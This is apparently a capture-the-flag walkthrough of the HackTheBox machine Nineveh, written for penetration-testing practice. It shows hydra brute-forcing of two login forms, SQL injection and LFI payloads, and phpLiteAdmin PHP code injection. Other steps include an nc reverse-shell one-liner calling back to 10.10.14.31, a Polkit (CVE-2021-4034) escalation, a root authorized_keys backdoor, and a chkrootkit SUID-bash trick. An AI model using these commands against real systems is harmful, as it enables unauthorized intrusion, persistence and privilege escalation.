HackTheBox - Nineveh

Overview

This machine begins w/ a web enumeration, discovering a login page on both TCP/80 (HTTP) & TCP/443 (HTTPS) that is both susceptible to a bruteforce attack due to a weak password and the lack of bruteforce prevention.

On TCP/443, phpLiteAdmin 1.9 is running, it is susceptible to a RCE exploit, an attacker is able to create a database w/ a .php file extension and a insert a PHP reverse shell into the values of the table. Also, after directory enumeration, a directory containing an image is discovered, after analyzing the image, SSH private key is embedded into the image.

On TCP/80 there is a limited LFI vulnerability, combined w/ the exploit on TCP/443 (HTTPS) we are able to include the PHP reverse shell, obtaining a low-privilege/www-data shell.

For privilege escalation we have to escalate our privileges twice, once to Amorois and to root. To privilege escalate to Amrois, use the SSH key found from the image. There are 2 ways to obtain root, chkrootkit & Polkit

If you wish to practice the same/similar LFI try Vulnhub Zico2.

---

Column	Details
Box Name	Nineveh
IP	10.10.10.43
Points	-
Difficulty	Medium
Creator	Yas3r
Release Date	04-Aug-2017

Recon

TCP/80 (HTTP)

FFUF - directory-2.3-medium.txt

┌──(root💀kali)-[~/htb/nineveh]
└─# ffuf -u http://nineveh.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

200      GET        5l       25w      178c http://10.10.10.43/index.html
200      GET      977l     5005w        0c http://10.10.10.43/info.php
301      GET        9l       28w      315c http://10.10.10.43/department => http://10.10.10.43/department/
403      GET       11l       32w      299c http://10.10.10.43/server-status

• department

TCP/443 (HTTPS)

FFUF - directory-2.3-medium.txt

200      GET        1l        3w       49c https://10.10.10.43/index.html
301      GET        9l       28w      309c https://10.10.10.43/db => https://10.10.10.43/db/
403      GET       11l       32w      300c https://10.10.10.43/server-status
301      GET        9l       28w      319c https://10.10.10.43/secure_notes => https://10.10.10.43/secure_notes/

• secure_notes
• db

Initial Foothold

TCP/80 (HTTP) - Bruteforce Login

1. Proceed to http://nineveh.htb/department, there is a login page
2. Attempt SQLi Auth Bypass, failed!

    # Payload
    ' OR 1=1#
    ' OR 1=1 -- -
   

3. Attempt default creds, noticed something interesting

    # Default Creds
    admin:admin
    admin:password
   

   

   • It tells us that the password is invalid, meaning the username admin is valid
4. Bruteforce w/ hydra

    ┌──(root💀kali)-[~/htb/nineveh]
    └─# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"  -VI
    ...
    [80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
   

   • admin:1q2w3e4r5t
5. Login w/ admin:1q2w3e4r5t

TCP/80 (HTTP) - LFI

1. Found a potential LFI vulnerability

    /manage.php?notes=files/ninevehNotes.txt
   

   

   • check your secret folder to get in! figure it out! - some sort of hint?
2. Tried to directory enumerate /department/FUZZ, nothing found
3. I tried to enumerate it w/ a local file inclusion wordlist but it failed, there is probably some sort of input sanitization/checks.
4. To verify that ../ is not sanitized, I tried to go back a directory ../ and include ninevehNotes.txt, it worked!

    # Current Dir
    /var/www/html/department
   
    # ninevehNotes.txt location
    /var/www/html/department/files/ninevehNotes.txt
   
    # Payload
    /manage.php?notes=../department/files/ninevehNotes.txt
   
    1. ../               : goes back 1 dir        = /var/www/html
    2. /department/files : cd into department dir = /var/www/html/department/files
    3. ninevehNotes.txt  : the file we want
   

   

   • Conclusion
     • ../ - not sanitized/filtered
5. Next, I try to exclude the file extension (.txt), an error is triggered

    /manage.php?notes=../department/files/ninevehNotes
   

   

   • ninvehNotes - No such file or directory
6. However, if i try to include a file that I know exists (index.html, nineveh.png) it does not work, there is no output
   • 2 Conclusions
     • Only .txt files will be shown/reflected

         # Hypothesis
         $path_parts = pathinfo('$_GET["notes"]');
       			
         if $path_parts['extension'] = "txt"
             include $_GET["notes"]
       

     • Only filename that contains ninevehNotes will be shown

         # Hypothesis
         $path_parts = pathinfo('$_GET["notes"]');
       			
         if $path_parts['filename'] = "ninevehNotes"
             include $_GET["notes"]
       

7. I tried to include ninevehNotes.html to see if an error is triggered,
   • ninevehNotes.html - No such file or directory
   • Conclusion
     • The file that we want to include is processed only if it is named ninevehNotes.<ext>
   • Since this is the case, we are not able to do LFI2RCE, move on to TCP/443 (HTTPS)

TCP/443 - Image Forensics

1. Proceed to /secure_notes, there is an image displayed
2. Tried to directory enumerate /secure_notes/FUZZ, nothing found
3. Download the image nineveh.png
4. Check for comments w/ exiftool

    ┌──(root💀kali)-[~/htb/nineveh]
    └─# exiftool nineveh.png 
    ExifTool Version Number         : 12.39
    File Name                       : nineveh.png
    Directory                       : .
    File Size                       : 2.8 MiB
    File Modification Date/Time     : 2022:08:24 01:40:57+08:00
    File Access Date/Time           : 2022:08:24 01:40:56+08:00
    File Inode Change Date/Time     : 2022:08:24 01:40:57+08:00
    File Permissions                : -rw-r--r--
    File Type                       : PNG
    File Type Extension             : png
    MIME Type                       : image/png
    Image Width                     : 1497
    Image Height                    : 746
    Bit Depth                       : 8
    Color Type                      : RGB
    Compression                     : Deflate/Inflate
    Filter                          : Adaptive
    Interlace                       : Noninterlaced
    Significant Bits                : 8 8 8
    Software                        : Shutter
    Warning                         : [minor] Trailer data after PNG IEND chunk
    Image Size                      : 1497x746
    Megapixels                      : 1.1
   

   • No comments
5. Check if there are any files embeded in the image w/ binwalk, there is!

    ┌──(root💀kali)-[~/htb/nineveh]
    └─# binwalk -eM --run-as=root nineveh.png 
   	
    Scan Time:     2022-08-24 01:41:19
    Target File:   /root/htb/nineveh/nineveh.png
    MD5 Checksum:  353b8f5a4578e4472c686b6e1f15c808
    Signatures:    411
   	
    DECIMAL       HEXADECIMAL     DESCRIPTION
    ------------------------------------------------------------------------------
    0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
    84            0x54            Zlib compressed data, best compression
    2881744       0x2BF8D0        POSIX tar archive (GNU)
   	
   	
    Scan Time:     2022-08-24 01:41:20
    Target File:   /root/htb/nineveh/_nineveh.png.extracted/54
    MD5 Checksum:  d41d8cd98f00b204e9800998ecf8427e
    Signatures:    411
   	
    DECIMAL       HEXADECIMAL     DESCRIPTION
    ------------------------------------------------------------------------------
   	
   	
    Scan Time:     2022-08-24 01:41:20
    Target File:   /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.priv
    MD5 Checksum:  f426d661f94b16292efc810ebb7ea305
    Signatures:    411
   	
    DECIMAL       HEXADECIMAL     DESCRIPTION
    ------------------------------------------------------------------------------
    0             0x0             PEM RSA private key
   	
   	
    Scan Time:     2022-08-24 01:41:20
    Target File:   /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.pub
    MD5 Checksum:  6b60618d207ad97e76664174e805cfda
    Signatures:    411
   	
    DECIMAL       HEXADECIMAL     DESCRIPTION
    ------------------------------------------------------------------------------
    0             0x0             OpenSSH RSA public key
   

   • secret directory
     • This is probably what the note is refering to
     • Contains SSH private key, however TCP/22 (SSH) is not up, we might be able to use it later.

TCP/443 (HTTPS) - phpLiteAdmin v1.9 RCE

1. Proceed to db we see phpLiteAdmin v1.9, the moment I saw this, I knew by combining the LFI exploit and phpLiteAdmin v1.9 exploit, we can obtain a low-privilege shell.
   • Vulnhub Zico2 - InitialFoothold has the same exploit!
2. Bruteforce w/ hydra again

    ┌──(root💀kali)-[~/htb/nineveh]
    └─# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip https-post-form "/db/index.php :password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."  -VI
   	
    [443][http-post-form] host: 10.10.10.43   login: admin   password: password123
   

   • admin:password123

3. Search exploits for phpLiteAdmin

   Exploit Title	Path
   PHPLiteAdmin 1.9.3 - Remote PHP Code Injection	php/webapps/24044.txt

4. Try php/webapps/24044.txt
   1. How does the exploit work?
      • An attacker is able to create a Database w/ a php extension and insert PHP code as text fields in the Database, by accessing the file, PHP code is executed.
   2. Create a new database called ninevehNotes.php
      • Only files that are named ninevehNotes.<any ext> will be processed
   3. Create table called RCE
   4. Add field name w/ a default value of a PHP Code to read /etc/passwd

       Default Value
       <?php system("cat /etc/passwd");?>
      

      

   5. View location of database
      • /var/tmp/ninevehNotes.php
   6. We will head back to the LFI exploit

TCP/80 (HTTP) - LFI2RCE

1. Include /var/tmp/ninevehNotes.php, it works!

    # Current Dir
    /var/www/html/department
   	
    # ninevehNotes.php location
    /var/tmp/ninevehNotes.php
   	
    # Payload
    /manage.php?notes=../../../tmp/ninevehNotes.php
   	
    1. ../../../         : goes back 3 dir        = /var
    2. /tmp/files        : cd into /tmp           = /var/tmp/
    3. ninevehNotes.php  : the file we want      
   

   

2. Create another table called RCE2
3. Add field name w/ a default value of a PHP Code to invoke a reverse shell

    <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f");?>
   

   

4. Start listener
5. Execute reverse shell by including ninevehNotes.php
6. Shell obtained
7. Obtain a more stable shell

    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@nineveh:/home/amrois$ 	
   

Privilege Escalation - 1

Amrois - Via SSH Private Key

1. Earlier, we found SSH private key, transfer it to http://nineveh.htb

    www-data@nineveh:/tmp$ wget 10.10.14.31/nineveh.priv
    --2022-08-23 14:34:21--  http://10.10.14.31/nineveh.priv
    Connecting to 10.10.14.31:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1675 (1.6K) [application/octet-stream]
    Saving to: 'nineveh.priv'
   	
    nineveh.priv                  100%[==============================================>]   1.64K  --.-KB/s    in 0s      
   	
    2022-08-23 14:34:21 (262 MB/s) - 'nineveh.priv' saved [1675/1675]
   	
   

2. Change permission of nineveh.priv and SSH

    www-data@nineveh:/tmp$ chmod 600 nineveh.priv 
    www-data@nineveh:/tmp$ ssh amrois@localhost -i nineveh.priv 
   

3. Obtained amrois shell & User Flag

    390ff4e95074a5a0499f8e065fcedce9
   

   

Root - Via CVE-2021-4034

1. Found something interesting w/ linpeas.sh
   • CVE-2021-4034
2. Try CVE-2021-4034.py
   1. How does the exploit work?
      • Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes.
      • Due to an improper implementation of the pkexec tool, an out-of-bounds memory access can be leveraged by a local attacker to escalate their privileges to system root.
   2. Download Exploit
   3. Transfer to nineveh.htb & Exploit
3. Obtained Root Shell & Root Flag

    3fa9f72b3965a409759533e147293627
   

   

4. Obtain a persitent/stable root access
   1. Create private key for Amorois

       amrois@nineveh:/tmp$ ssh-keygen -t rsa
      

   2. Create /root/.ssh

       # mkdir -p /root/.ssh
      

   3. Place Amrois public key into /root/.ssh/authorized_keys

       echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD6ItIHY3OMLlsiLCB0FlW7Q5kGTHbORLFAxKzj3xS3mic7t2GDgwOEX2ZZQF5QVJQlRkZ/OGU3Fc++TCtKXSBvaWjAs3DIqaucyfaOaJ/MVi4sVzpRB4diErdjsGStx81QcoV8vl1o+GGHSjIHJsBbuVirVrE665RUu4M62tdk8bzzRj8j7gAVPOxYPO6UIQfjtA3n80cGCQnRLRhQivO4icxo+neiP/W9esV/JwjTYUzowynR86PF+ae9ABkdUveBQqWso8tI7/pGE9DycNLgfaXR9mGwH1ZQzySiG4mlyty568GCQvvhWkryHG4WhqE4NKbOUJlgvGXUevl/h3Rl amrois@nineveh" > /root/.ssh/authorized_keys
      

   4. Change permission of authorized_keys

       chmod 700 /root/.ssh
       chmod 600 /root/.ssh/authorized_keys
      

   5. SSH w/ Amorois private key

       amrois@nineveh:~/.ssh$ ssh -i yes root@localhost
      

      

Privilege Escalation - 2

Root - Chrookit Exploit

1. Found something interesting w/ pspy64
   • chkrootkit is executed as root.

2. Search exploits for chkrootkit

   Exploit Title	Path
   Chkrootkit 0.49 - Local Privilege Escalation	linux/local/33899.txt

3. Try 33899.txt
   1. How does the exploit work?
      • The line 'file_port=$file_port $i' will execute all files specified in $SLAPPER_FILES as the user chkrootkit is running (usually root), if $file_port is empty, because of missing quotation marks around the variable assignment.
   2. /tmp/update will be executed as root due to the vulnerability
   3. Create script to set SUID bit on /bin/bash

       amrois@nineveh:~$ nano /tmp/update
      		
       cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash
      
       amrois@nineveh:~$ chmod +x /tmp/update
      

   4. Wait for chkrootkit to execute
   5. Obtained Root Shell